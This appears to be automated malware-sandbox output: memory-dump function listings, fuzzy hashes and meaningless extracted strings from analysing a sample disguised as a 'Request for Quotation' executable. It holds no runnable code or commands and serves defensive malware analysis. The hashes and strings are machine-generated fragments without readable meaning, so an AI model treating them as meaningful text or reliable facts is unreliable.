Source File: 00000000.00000002.2118346261.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c50000_Request for Quotation MK FMHS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb314e72c14df79dbd47e360dd24ee94f1cb2ed3c0bd35f514535a1f0602d857
Instruction ID: b8473eb97db775113cae44d5342dd7058baffad6ee02e75b8b51ac22bf4d0d70
Opcode Fuzzy Hash: bb314e72c14df79dbd47e360dd24ee94f1cb2ed3c0bd35f514535a1f0602d857
Instruction Fuzzy Hash: 72E10C74E102198FCB54DF99C9809AEFBF2FF89304F648169D814AB355DB31A982CF64

Function 00EFD51C Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2112662144.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ef0000_Request for Quotation MK FMHS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 774b5a8312f870a34479a520da1b8a0ce0f0ba7fab9ca58fd4e41dbe6dcc37aa
Instruction ID: 9cc419200c2cd3f5e32ee9417fb3a5957aedc85c8cb4042b8600da63e7502c28
Opcode Fuzzy Hash: 774b5a8312f870a34479a520da1b8a0ce0f0ba7fab9ca58fd4e41dbe6dcc37aa
Instruction Fuzzy Hash: FBA14E32A11209CFCF15DFB4C8805AEB7B2FF85304B1595BAEA05BB266DB71D915CB40

Analysis Process: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exePID: 5268, Parent PID: 4408COMMON

Executed Functions

Function 012529E0 Relevance: 8.2, Strings: 6, Instructions: 685COMMON

Download Yara Rule

Strings

Xwq, xrefs: 01253CF6
Xwq, xrefs: 01252A9E
Xwq, xrefs: 01253CCD
Xwq, xrefs: 01252B57
Xwq, xrefs: 01252AD8
Xwq, xrefs: 01252BA4

Memory Dump Source

Source File: 00000009.00000002.4516022475.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1250000_Request for Quotation MK FMHS.jbxd

Similarity

API ID:
String ID: Xwq$Xwq$Xwq$Xwq$Xwq$Xwq
API String ID: 0-2833233147
Opcode ID: 825f41ef59a8c0d92b53f8585cd1c9e45ac4e8fb1032e8ee2a1c0a73a96ad1e6
Instruction ID: b4e30c33f63c2bd41b5cd35e250fc2bf6d3c0d3a696c5f5d0196e702ff7736fb
Opcode Fuzzy Hash: 825f41ef59a8c0d92b53f8585cd1c9e45ac4e8fb1032e8ee2a1c0a73a96ad1e6
Instruction Fuzzy Hash: FD420973D28754CFCBA2CF74C8C66AB7BB0BB45320B48945ED4469A242EB39DD00CB95

Function 01256FC8 Relevance: 6.8, Strings: 5, Instructions: 525COMMON

Download Yara Rule

Strings

,wq, xrefs: 0125728A
(osq, xrefs: 0125753D
(osq, xrefs: 01257212
,wq, xrefs: 01257298
(osq, xrefs: 01257220

Memory Dump Source

Source File: 00000009.00000002.4516022475.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1250000_Request for Quotation MK FMHS.jbxd

Similarity

API ID:
String ID: (osq$(osq$(osq$,wq$,wq
API String ID: 0-1903262254
Opcode ID: 9e1aca12a60622e0a9160520f78916b5112eea916c553e221e4ac60879d75189
Instruction ID: 2f011c2e413228c6b69e30fa52a4157318f04841865480e9dda6a6bd95413b75
Opcode Fuzzy Hash: 9e1aca12a60622e0a9160520f78916b5112eea916c553e221e4ac60879d75189
Instruction Fuzzy Hash: 73224B30A6025A9FDB55CF68D884AAEBFF6BF88314F958069ED05EB261D730DC41CB50

Function 0125C146 Relevance: 6.5, Strings: 5, Instructions: 227COMMON

Download Yara Rule

Strings

Ljzp, xrefs: 0125C38D
Ljzp, xrefs: 0125C377
PHsq, xrefs: 0125C400
0ozp, xrefs: 0125C20A
PHsq, xrefs: 0125C3EF

Memory Dump Source

Source File: 00000009.00000002.4516022475.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1250000_Request for Quotation MK FMHS.jbxd

Similarity

API ID:
String ID: 0ozp$Ljzp$Ljzp$PHsq$PHsq
API String ID: 0-2658838366
Opcode ID: b0ac79922a495784abf8f6cb843917f5981ff6bc6c603673f9a10af5a684003c
Instruction ID: c298f2b2952bd2e303bc70d2bd7b0d5644468a2b018d4900fd4305c3a2604d3c
Opcode Fuzzy Hash: b0ac79922a495784abf8f6cb843917f5981ff6bc6c603673f9a10af5a684003c
Instruction Fuzzy Hash: D2A10675E10218DFDB54DFA9D884A9DBBF6BF89310F14C069E909AB361EB309981CF50

Function 0125C468 Relevance: 6.4, Strings: 5, Instructions: 197COMMON

Download Yara Rule

Strings

PHsq, xrefs: 0125C6D0
PHsq, xrefs: 0125C6BF
0ozp, xrefs: 0125C4DA
Ljzp, xrefs: 0125C65D
Ljzp, xrefs: 0125C647

Memory Dump Source

Source File: 00000009.00000002.4516022475.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1250000_Request for Quotation MK FMHS.jbxd

Similarity

API ID:
String ID: 0ozp$Ljzp$Ljzp$PHsq$PHsq
API String ID: 0-2658838366
Opcode ID: 1fc1339741b06021e33dc5bf2e580e4f3583b202eeab9c35ba7fb78989aead8e
Instruction ID: 5f60aabe25fd04bb515fcbc47c83c1c5dc95a3e96cf9d0497e843ac6c7f8ed87
Opcode Fuzzy Hash: 1fc1339741b06021e33dc5bf2e580e4f3583b202eeab9c35ba7fb78989aead8e
Instruction Fuzzy Hash: C991D5B4E10218CFDB54DFA9D984A9DBBF2BF88300F14D069E919AB355EB709981CF50

Function 01255362 Relevance: 6.4, Strings: 5, Instructions: 195COMMON

Download Yara Rule

Strings

0ozp, xrefs: 012553E2
PHsq, xrefs: 012555D9
Ljzp, xrefs: 01255566
PHsq, xrefs: 012555C8
Ljzp, xrefs: 01255550

Memory Dump Source

Source File: 00000009.00000002.4516022475.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1250000_Request for Quotation MK FMHS.jbxd

Similarity

API ID:
String ID: 0ozp$Ljzp$Ljzp$PHsq$PHsq
API String ID: 0-2658838366
Opcode ID: b19e8939e404867f3c57970a5ec7be1bd4eb90d4d823ba53f28297322932a656
Instruction ID: 97f3777a34719a847d9d01aa29b73a8a73ce2d42f315cf97b279caf171e4e3da
Opcode Fuzzy Hash: b19e8939e404867f3c57970a5ec7be1bd4eb90d4d823ba53f28297322932a656
Instruction Fuzzy Hash: 7691E374E10218CFDB58DFA9D884A9DBBF2BF88310F14D069E819AB365DB709985CF10

Function 0125D278 Relevance: 6.4, Strings: 5, Instructions: 187COMMON

Download Yara Rule

Strings

Ljzp, xrefs: 0125D457
Ljzp, xrefs: 0125D46D
0ozp, xrefs: 0125D2EA
PHsq, xrefs: 0125D4E0
PHsq, xrefs: 0125D4CF

Memory Dump Source

Source File: 00000009.00000002.4516022475.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1250000_Request for Quotation MK FMHS.jbxd

Similarity

API ID:
String ID: 0ozp$Ljzp$Ljzp$PHsq$PHsq
API String ID: 0-2658838366
Opcode ID: 9c419f0dde98bc33d640a88419fbcea8d3e36e5bcb4fe51cfc9a7984f8ffa505
Instruction ID: 244b8238aa9f2f13fab7da658d5a908664e9e84a34d8d8982f02340a3e9406a9
Opcode Fuzzy Hash: 9c419f0dde98bc33d640a88419fbcea8d3e36e5bcb4fe51cfc9a7984f8ffa505
Instruction Fuzzy Hash: 1C81B6B4E10219CFDB54DFAAD984A9DBBF2BF88300F14D069E819AB365DB705985CF10

Function 0125CA08 Relevance: 6.4, Strings: 5, Instructions: 186COMMON

Download Yara Rule

Strings

0ozp, xrefs: 0125CA7A
PHsq, xrefs: 0125CC5F
PHsq, xrefs: 0125CC70
Ljzp, xrefs: 0125CBE7
Ljzp, xrefs: 0125CBFD

Memory Dump Source

Source File: 00000009.00000002.4516022475.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1250000_Request for Quotation MK FMHS.jbxd

Similarity

API ID:
String ID: 0ozp$Ljzp$Ljzp$PHsq$PHsq
API String ID: 0-2658838366
Opcode ID: 806b86f8fa6948b675eac8c93bb3196b1e2575e71306dbbd818c43172e2820e1
Instruction ID: 6ccab8a8bf0a34b8970c3070ea1c17ff791d4ca8c506ed1705586a7dd45092e0
Opcode Fuzzy Hash: 806b86f8fa6948b675eac8c93bb3196b1e2575e71306dbbd818c43172e2820e1
Instruction Fuzzy Hash: A481A674E10218CFDB54DFAAD884A9DBBF2BF88310F14D169E819AB355EB709981CF50

Function 0125CCD8 Relevance: 6.4, Strings: 5, Instructions: 185COMMON

Download Yara Rule

Strings

PHsq, xrefs: 0125CF2F
0ozp, xrefs: 0125CD4A
Ljzp, xrefs: 0125CECD
Ljzp, xrefs: 0125CEB7
PHsq, xrefs: 0125CF40

Memory Dump Source

Source File: 00000009.00000002.4516022475.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1250000_Request for Quotation MK FMHS.jbxd

Similarity

API ID:
String ID: 0ozp$Ljzp$Ljzp$PHsq$PHsq
API String ID: 0-2658838366
Opcode ID: 287beda877865dcd6641902838df411428177b799a487f21f9a07808695f1a7f
Instruction ID: 6ae6490bb76d978bf5961ba8085f838b66b99ff33b88cd3138277ee2839f8d09
Opcode Fuzzy Hash: 287beda877865dcd6641902838df411428177b799a487f21f9a07808695f1a7f
Instruction Fuzzy Hash: 2281B7B4E10218CFDB54DFA9D984A9DBBF2BF88300F14D069E819AB355EB705981CF50

Function 0125C738 Relevance: 6.4, Strings: 5, Instructions: 184COMMON

Download Yara Rule

Strings

0ozp, xrefs: 0125C7AA
PHsq, xrefs: 0125C9A0
PHsq, xrefs: 0125C98F
Ljzp, xrefs: 0125C917
Ljzp, xrefs: 0125C92D

Memory Dump Source

Source File: 00000009.00000002.4516022475.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1250000_Request for Quotation MK FMHS.jbxd

Similarity

API ID:
String ID: 0ozp$Ljzp$Ljzp$PHsq$PHsq
API String ID: 0-2658838366
Opcode ID: 9680b5843c646fa2cd250ede1f10ccd99db1f18b5e4bbe7668f8ac42346fb671
Instruction ID: 85914dd74dcc07764f985d7f68e51bf3dfa6ad5b466a5604772c93124a8563fd
Opcode Fuzzy Hash: 9680b5843c646fa2cd250ede1f10ccd99db1f18b5e4bbe7668f8ac42346fb671
Instruction Fuzzy Hash: 2881C574E10218CFDB54DFAAD984A9DBBF2BF88310F14D069E819AB355EB709881CF50

Function 0125CFA9 Relevance: 6.4, Strings: 5, Instructions: 184COMMON

Download Yara Rule

Strings

Ljzp, xrefs: 0125D187
PHsq, xrefs: 0125D1FF
0ozp, xrefs: 0125D01A
Ljzp, xrefs: 0125D19D
PHsq, xrefs: 0125D210

Memory Dump Source

Source File: 00000009.00000002.4516022475.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1250000_Request for Quotation MK FMHS.jbxd

Similarity

API ID:
String ID: 0ozp$Ljzp$Ljzp$PHsq$PHsq
API String ID: 0-2658838366
Opcode ID: b604300dcd0eb95b6c90128db0fe42b9c6d0d703ef0ee12a5fbaf863f2c05d31
Instruction ID: ce16cc5b2df25259fac35bdb48d929ae74954536d6db3287520b09ffc5dd92a8
Opcode Fuzzy Hash: b604300dcd0eb95b6c90128db0fe42b9c6d0d703ef0ee12a5fbaf863f2c05d31
Instruction Fuzzy Hash: 3381A574E10218CFDB54DFAAD984A9DBBF2BF88310F14D069E819AB365DB709981CF50

Function 012569A0 Relevance: 3.0, Strings: 2, Instructions: 515COMMON

Download Yara Rule

Strings

(osq, xrefs: 01256EDA
Hwq, xrefs: 01256DA6

Memory Dump Source

Source File: 00000009.00000002.4516022475.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1250000_Request for Quotation MK FMHS.jbxd

Similarity

API ID:
String ID: (osq$Hwq
API String ID: 0-1668724233
Opcode ID: f4d1f4ccad299f3b2ed8e0836e05542e3d26011fe89956a604edbdf8c3d9eba7
Instruction ID: 8f252ae352f6cc88779e8d03d4c817fb260841ce7b14a9cee57aa44756364f45
Opcode Fuzzy Hash: f4d1f4ccad299f3b2ed8e0836e05542e3d26011fe89956a604edbdf8c3d9eba7
Instruction Fuzzy Hash: 00128D70A1021A8FDB58DF69C894BAEBBF6BF88300F548529E945DB395DF309D41CB90

Function 01253E09 Relevance: 2.9, Strings: 2, Instructions: 425COMMON

Download Yara Rule

Strings

Xwq, xrefs: 01253E47
$sq, xrefs: 01253E2E

Memory Dump Source

Source File: 00000009.00000002.4516022475.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1250000_Request for Quotation MK FMHS.jbxd

Similarity

API ID:
String ID: Xwq$$sq
API String ID: 0-2558833440
Opcode ID: cc34ec53de6553813e609826de0c4f9f4a39bcf1c8a433d6203b5e9d1f8579e1
Instruction ID: 4654545c15d9a938ba67b7a58348e0061e183b490c1405fcfadca6b5d678e4fb
Opcode Fuzzy Hash: cc34ec53de6553813e609826de0c4f9f4a39bcf1c8a433d6203b5e9d1f8579e1
Instruction Fuzzy Hash: 96F18E75E10219CFCB58EFB9D4856AEBBB2BF88310B14852DE806E7358DF359942CB50

Function 059781D0 Relevance: 2.7, Strings: 2, Instructions: 182COMMON

Download Yara Rule

Strings

PHsq, xrefs: 0597841B
PHsq, xrefs: 0597840A

Memory Dump Source

Source File: 00000009.00000002.4528284472.0000000005970000.00000040.00000800.00020000.00000000.sdmp, Offset: 05970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5970000_Request for Quotation MK FMHS.jbxd

Similarity

API ID:
String ID: PHsq$PHsq
API String ID: 0-3507005907
Opcode ID: d87322cab0213634a859f6c2cd84af8effaff64457e643104405612eca953d8e
Instruction ID: 5f081f296b48356a265d407038dbad9276f97db123303a906ed1e56cf97c2d70
Opcode Fuzzy Hash: d87322cab0213634a859f6c2cd84af8effaff64457e643104405612eca953d8e
Instruction Fuzzy Hash: 5181CF74E0021CCFDB58DFAAC998BADBBB2BF89300F20956AD419AB354DB355945CF40

Function 05977B78 Relevance: .3, Instructions: 296COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4528284472.0000000005970000.00000040.00000800.00020000.00000000.sdmp, Offset: 05970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5970000_Request for Quotation MK FMHS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e396310ba1ca29107667532c4908c4d41fec63de8dac4fe29173b934c6806f42
Instruction ID: 98e102a47c65d0c9bbba284c8b3fc25b7676c4c3d299fed33d2a5d3ae729b396
Opcode Fuzzy Hash: e396310ba1ca29107667532c4908c4d41fec63de8dac4fe29173b934c6806f42
Instruction Fuzzy Hash: D0E19174E01218CFDB64DFA5D984BDDBBB2BF89304F2081AAD809A7394DB755A85CF10

Function 05978FB0 Relevance: .3, Instructions: 272COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4528284472.0000000005970000.00000040.00000800.00020000.00000000.sdmp, Offset: 05970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5970000_Request for Quotation MK FMHS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a81f48c62209ead9d6b736bf7964e90623e386c928f309fdef060ef0848c541
Instruction ID: 81e2a4f0c3b183aeb16521e112141a231c38f37ef6f50795709153c865d41a03
Opcode Fuzzy Hash: 5a81f48c62209ead9d6b736bf7964e90623e386c928f309fdef060ef0848c541
Instruction Fuzzy Hash: ADD18B78E00218CFDB54DFA9D994B9DBBB2BF89300F1091A9D909AB354DB356E81CF11

Function 0125E97A Relevance: .1, Instructions: 149COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4516022475.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1250000_Request for Quotation MK FMHS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3e5c1cb5be788ea78bd42e09d0453bace7aaa59f8153fda74928d362cd38839
Instruction ID: 07d0e7ddc3fff71f2d6ef828f8bee95311f7f2d43cdaf50eed58bc9b392d4242
Opcode Fuzzy Hash: e3e5c1cb5be788ea78bd42e09d0453bace7aaa59f8153fda74928d362cd38839
Instruction Fuzzy Hash: C851A6B4E10208DFDB58DFBAD494A9DFBB2BF88300F259129E915AB364DB715941CF10

Function 0125F2C0 Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4516022475.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1250000_Request for Quotation MK FMHS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ea8b66b7521e7ba0d6a66f1c156a3f6889224bb52dcefbf6bd35dd73f5edb3f
Instruction ID: e73d8d38c5c51c31f3ae47b758a05a145345173597b60d63c025171cd9e8840e
Opcode Fuzzy Hash: 5ea8b66b7521e7ba0d6a66f1c156a3f6889224bb52dcefbf6bd35dd73f5edb3f
Instruction Fuzzy Hash: 60515B70D21219CBDB44EFA9D6847EEBBB2FB88300F54D129D904BB298D7759981CF50

Function 0125E988 Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4516022475.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1250000_Request for Quotation MK FMHS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 50396cb63f453f658009f9793529350d2cdb6c2a2462722ad9337f4fa9c9f661
Instruction ID: 2351bfae2350edeb0af47e292045fc69bb46f6ec427d5dd450cf50e15c55507f
Opcode Fuzzy Hash: 50396cb63f453f658009f9793529350d2cdb6c2a2462722ad9337f4fa9c9f661
Instruction Fuzzy Hash: 94519174E10208DFDB58DFBAD884A9DFBB2BF88300F249129E919AB364DB305941CF54

Function 0125F4AC Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4516022475.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1250000_Request for Quotation MK FMHS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 843b1b17f9e603caca3be8105bed7278e362ccbc23f68c9dcf1420c51c055071
Instruction ID: 1d3011686fb6674f287415a360659ba0472176302160f8ad1856520c95916508
Opcode Fuzzy Hash: 843b1b17f9e603caca3be8105bed7278e362ccbc23f68c9dcf1420c51c055071
Instruction Fuzzy Hash: 34513470D25219CFDB50EFA8D6C87EDBBB2FB48310F649119D905AB288D775A881CF50

Function 05977B69 Relevance: .1, Instructions: 114COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4528284472.0000000005970000.00000040.00000800.00020000.00000000.sdmp, Offset: 05970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5970000_Request for Quotation MK FMHS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1e087eb38047be7d3b43f41bd0d766da9d24c48983edb2ead82605cb9e8c2ab
Instruction ID: f2aa3c636434e109595c0b0e0bc03295c95bfd3590a909e8207857458dd3c48a
Opcode Fuzzy Hash: e1e087eb38047be7d3b43f41bd0d766da9d24c48983edb2ead82605cb9e8c2ab
Instruction Fuzzy Hash: BB41C2B4E002188BEB18DFAAC9547DEBBF2BF89300F14D06AD818BB254DB355946CF54

Function 05978FA1 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4528284472.0000000005970000.00000040.00000800.00020000.00000000.sdmp, Offset: 05970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5970000_Request for Quotation MK FMHS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 58e81ed95f60f10ab42c8d0ebb5e4866e723d62f107163c4adf28ebbe49f215a
Instruction ID: 56984c42c75d4a96470a5679be3280d0e6db75e710b2fde03ab43817bcfc0bc4
Opcode Fuzzy Hash: 58e81ed95f60f10ab42c8d0ebb5e4866e723d62f107163c4adf28ebbe49f215a
Instruction Fuzzy Hash: AD41B275E002088BEB18DFAAD9546DEBBF2AF89300F20D12AD419BB254EB355946CF50

Function 012576F1 Relevance: 10.5, Strings: 8, Instructions: 475COMMON

Download Yara Rule

Strings

(osq, xrefs: 01257815
,wq, xrefs: 01257BA0
(osq, xrefs: 0125772E
(osq, xrefs: 012578B2
(osq, xrefs: 012577E9
(osq, xrefs: 01257C0F
,wq, xrefs: 01257B90
(osq, xrefs: 01257BFF

Memory Dump Source

Source File: 00000009.00000002.4516022475.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1250000_Request for Quotation MK FMHS.jbxd

Similarity

API ID:
String ID: (osq$(osq$(osq$(osq$(osq$(osq$,wq$,wq
API String ID: 0-1935560061
Opcode ID: a62ba1d871a0b0badabadb5b264fc4e29638cd1f7da576c807cecc3c4c0eb46e
Instruction ID: 07fc430ba72770e52ad5366fedafb49c6a2e74d7426c518d6d17ea8577bb78e1
Opcode Fuzzy Hash: a62ba1d871a0b0badabadb5b264fc4e29638cd1f7da576c807cecc3c4c0eb46e
Instruction Fuzzy Hash: C8125B30A602498FCB55CF68D8C4AAEBBF2FF88314F558599EA459B261DB30ED41CB50

Function 01259DE0 Relevance: 4.4, Strings: 3, Instructions: 669COMMON

Download Yara Rule

Strings

4'sq, xrefs: 01259F0C
4'sq, xrefs: 01259E04
(osq, xrefs: 0125A518

Memory Dump Source

Source File: 00000009.00000002.4516022475.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1250000_Request for Quotation MK FMHS.jbxd

Similarity

API ID:
String ID: (osq$4'sq$4'sq
API String ID: 0-3829489236
Opcode ID: 0277668ca4411b321f4f9b583e1dc9713d15669d849f9e577c2c3c54f422cc2c
Instruction ID: 0a344bfb6f71bbc6304c8d17ebbe0a973a4862b4b373e0fb8c30a30707b16cff
Opcode Fuzzy Hash: 0277668ca4411b321f4f9b583e1dc9713d15669d849f9e577c2c3c54f422cc2c
Instruction Fuzzy Hash: 0542B170A1020ACFCB55CFA8C885AAEBFF6FF89310F14856AE905DB252D775E845CB50

Function 01258490 Relevance: 3.2, Strings: 2, Instructions: 703COMMON

Download Yara Rule

Strings

$sq, xrefs: 01258FD7
$sq, xrefs: 01258FB4

Memory Dump Source

Source File: 00000009.00000002.4516022475.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1250000_Request for Quotation MK FMHS.jbxd

Similarity

API ID:
String ID: $sq$$sq
API String ID: 0-1184984226
Opcode ID: df0835409fdbb61442b59697a0aba8792b75bfd25fd92647a6d7760138f4dc57
Instruction ID: f7a323e8d58ce565bfb4ddec54f5816e117bd325632d1e65d720a2cace07151b
Opcode Fuzzy Hash: df0835409fdbb61442b59697a0aba8792b75bfd25fd92647a6d7760138f4dc57
Instruction Fuzzy Hash: C85222B0A10219CFEB559BE4C850BAEBB72FF84300F1080AAD64A6B354DF759D85DF52

Function 01255F38 Relevance: 2.8, Strings: 2, Instructions: 327COMMON

Download Yara Rule

Strings

Hwq, xrefs: 01256023
Hwq, xrefs: 01256056

Memory Dump Source

Source File: 00000009.00000002.4516022475.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1250000_Request for Quotation MK FMHS.jbxd

Similarity

API ID:
String ID: Hwq$Hwq
API String ID: 0-741242263
Opcode ID: 2164b7843a60333759c2a61b041119346c57bdffc0a105f1e61240d108959b0a
Instruction ID: 47a891e9aeb60b27df9593f8112d90c03cbbe2a1bddf7920f8ca1f83ed9b4433
Opcode Fuzzy Hash: 2164b7843a60333759c2a61b041119346c57bdffc0a105f1e61240d108959b0a
Instruction Fuzzy Hash: 19B1F1307242028FDB65AB78D898B7E7BA2BF89350F048529E906CB395DF74CC42C791

Function 01256498 Relevance: 2.7, Strings: 2, Instructions: 232COMMON

Download Yara Rule

Strings

,wq, xrefs: 01256578
,wq, xrefs: 0125656E

Memory Dump Source

Source File: 00000009.00000002.4516022475.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1250000_Request for Quotation MK FMHS.jbxd

Similarity

API ID:
String ID: ,wq$,wq
API String ID: 0-1895925779
Opcode ID: 7e60a947642d731dd2adb65642101fdc69ee5f93d87e2860ed73c76439ce2f48
Instruction ID: 1dcd2f78eda7f7a4f4f0f2c9a11ff28817b845d127dea117cf59c1de873cb50b
Opcode Fuzzy Hash: 7e60a947642d731dd2adb65642101fdc69ee5f93d87e2860ed73c76439ce2f48
Instruction Fuzzy Hash: 7D81CD70B20506CFDB98CF6DC4C496ABBF2FF89214B948169DA05DB365DB35E841CBA0

Function 05978A68 Relevance: 2.7, Strings: 2, Instructions: 208COMMON

Download Yara Rule

Strings

(&sq, xrefs: 05978B83
(wq, xrefs: 05978C42

Memory Dump Source

Source File: 00000009.00000002.4528284472.0000000005970000.00000040.00000800.00020000.00000000.sdmp, Offset: 05970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5970000_Request for Quotation MK FMHS.jbxd

Similarity

API ID:
String ID: (&sq$(wq
API String ID: 0-153982265
Opcode ID: 7215b96c4c9c49fc2e34cbffb0de74eb326066daf5bee8f4c13b48b03c201058
Instruction ID: d5612d601744ec033f6631bc9a7eb770e832570409747c9a2f7a22a37c7a7f19
Opcode Fuzzy Hash: 7215b96c4c9c49fc2e34cbffb0de74eb326066daf5bee8f4c13b48b03c201058
Instruction Fuzzy Hash: 14717371F042195BDF19DBA9C8946EEBBB6BFC8700F144529E406AB380DF309D46C795

Function 0125AEBA Relevance: 2.6, Strings: 2, Instructions: 123COMMON

Download Yara Rule

Strings

(osq, xrefs: 0125AECD
(osq, xrefs: 0125B079

Memory Dump Source

Source File: 00000009.00000002.4516022475.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1250000_Request for Quotation MK FMHS.jbxd

Similarity

API ID:
String ID: (osq$(osq
API String ID: 0-4199119687
Opcode ID: 273cf48a1e10a3bb79f5f7f09d8caaec0d1dfa2d7a536bb91f115a311e2fe71e
Instruction ID: 96b8672352e8ee38acada34a7ba7ed7ef082482b90915c8e55886d072d793c6a
Opcode Fuzzy Hash: 273cf48a1e10a3bb79f5f7f09d8caaec0d1dfa2d7a536bb91f115a311e2fe71e
Instruction Fuzzy Hash: 864129717142458FCB559B78E8556AEBFF3BFC9310F144469EA16CB291DE318C01CB91

Function 01259D59 Relevance: 2.5, Strings: 2, Instructions: 44COMMON

Download Yara Rule

Strings

4'sq, xrefs: 01259D6D
4'sq, xrefs: 01259D84

Memory Dump Source

Source File: 00000009.00000002.4516022475.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1250000_Request for Quotation MK FMHS.jbxd

Similarity

API ID:
String ID: 4'sq$4'sq
API String ID: 0-780347173
Opcode ID: 26881573d066adf72e34f443fbcae12b67a2e8ff9f5d2bec1b60738d1ecbdf60
Instruction ID: 9073a986b5cebebc6e15363be4a393932b11bd01322a4d65a8df7e10e6421ac2
Opcode Fuzzy Hash: 26881573d066adf72e34f443fbcae12b67a2e8ff9f5d2bec1b60738d1ecbdf60
Instruction Fuzzy Hash: 4FF068353041156FDF192AA9989497FBBDBEBCC260B148429BF0AC7351DF72CC4193A0

Function 01250C8F Relevance: 1.8, Strings: 1, Instructions: 546COMMON

Download Yara Rule

Strings

LRsq, xrefs: 01250F19

Memory Dump Source

Source File: 00000009.00000002.4516022475.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1250000_Request for Quotation MK FMHS.jbxd

Similarity

API ID:
String ID: LRsq
API String ID: 0-3165563352
